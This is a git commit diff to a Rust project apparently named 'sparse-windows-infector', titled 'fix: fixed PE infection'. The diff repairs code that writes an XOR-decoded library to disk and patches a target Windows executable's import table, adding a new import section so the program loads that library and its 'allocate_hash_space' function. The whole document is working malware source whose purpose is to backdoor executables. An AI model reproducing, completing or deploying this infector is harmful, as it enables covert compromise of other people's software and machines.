fix: fixed PE infection

2025-02-19 22:40:39 -05:00
parent d823603054
commit 005048f1ce
10 changed files with 118 additions and 92 deletions
--- a/sparse-windows-infector/src/lib.rs
+++ b/sparse-windows-infector/src/lib.rs
@@ -1,5 +1,5 @@
 use std::{
-    io::{Error, prelude::*},
+    io::{prelude::*, Error},
    path::Path,
 };

@@ -29,11 +29,7 @@ where
        *b = *b ^ (XOR_KEY as u8);
    }

-    for i in 0..(sparse_library.len() - sparse_parameters.len()) {
-        if sparse_library[i..(i + sparse_parameters.len())] == vec![b'B'; sparse_parameters.len()] {
-            sparse_library[i..(i + sparse_parameters.len())].copy_from_slice(&sparse_parameters);
-        }
-    }
+    sparse_library.extend(sparse_parameters);

    std::fs::write(&target_library_path, sparse_library)?;

@@ -111,7 +107,6 @@ where
    };

    struct Section {
-        name: [u8; 8],
        section_header_idx: usize,
        data: Vec<u8>,
    }
@@ -124,7 +119,6 @@ where
        .iter()
        .enumerate()
        .map(|(section_header_idx, sechdr)| Section {
-            name: sechdr.name.clone(),
            section_header_idx,
            data: binary_data[sechdr.raw_data_ptr as usize
                ..(sechdr.raw_data_ptr + sechdr.raw_data_size) as usize]
@@ -135,7 +129,7 @@ where
    // modify the PE

    let Some(import_table_section_idx) = section_headers.iter().position(|section| {
-        (section.raw_data_ptr..(section.raw_data_ptr + section.raw_data_size))
+        (section.virtual_address..(section.virtual_address + section.virtual_size))
            .contains(&optional_header.import_table.virtual_address)
    }) else {
        eprintln!("Could not find section with import table");
@@ -147,9 +141,17 @@ where
        std::str::from_utf8(&section_headers[import_table_section_idx].name)
    );

-    let start_index = optional_header.import_table.virtual_address
-        - section_headers[import_table_section_idx].virtual_address
-        + section_headers[import_table_section_idx].raw_data_ptr;
+    let start_index = section_headers
+        .iter()
+        .find_map(|sh| {
+            (sh.virtual_address..(sh.virtual_address + sh.virtual_size))
+                .contains(&optional_header.import_table.virtual_address)
+                .then_some(
+                    optional_header.import_table.virtual_address - sh.virtual_address
+                        + sh.raw_data_ptr,
+                )
+        })
+        .unwrap_or(optional_header.import_table.virtual_address);

    let import_descriptors: *const ImportDescriptor =
        unsafe { binary_data.as_ptr().offset(start_index as isize) as *const _ };
@@ -256,7 +258,6 @@ where
            .to_vec();

    let mut import_section = Section {
-        name: *b".import\0",
        section_header_idx: section_headers.len() - 1,
        data: vec![],
    };
@@ -306,13 +307,16 @@ where
    import_section.data.push(0x00);

    let lib_func_name_offset = import_section.data.len();
+
+    let linked_function = b"allocate_hash_space";
    import_section.data.push(0x02);
    import_section.data.push(0x00);
-    import_section.data.extend(b"compute_hash");
+    import_section.data.extend(linked_function);

-    import_section
-        .data
-        .extend(&vec![0u8; 256 - (file_name.len() + 15)]);
+    import_section.data.extend(&vec![
+        0u8;
+        256 - (file_name.len() + linked_function.len() + 3)
+    ]);

    import_section.data.extend(&vec![
        0u8;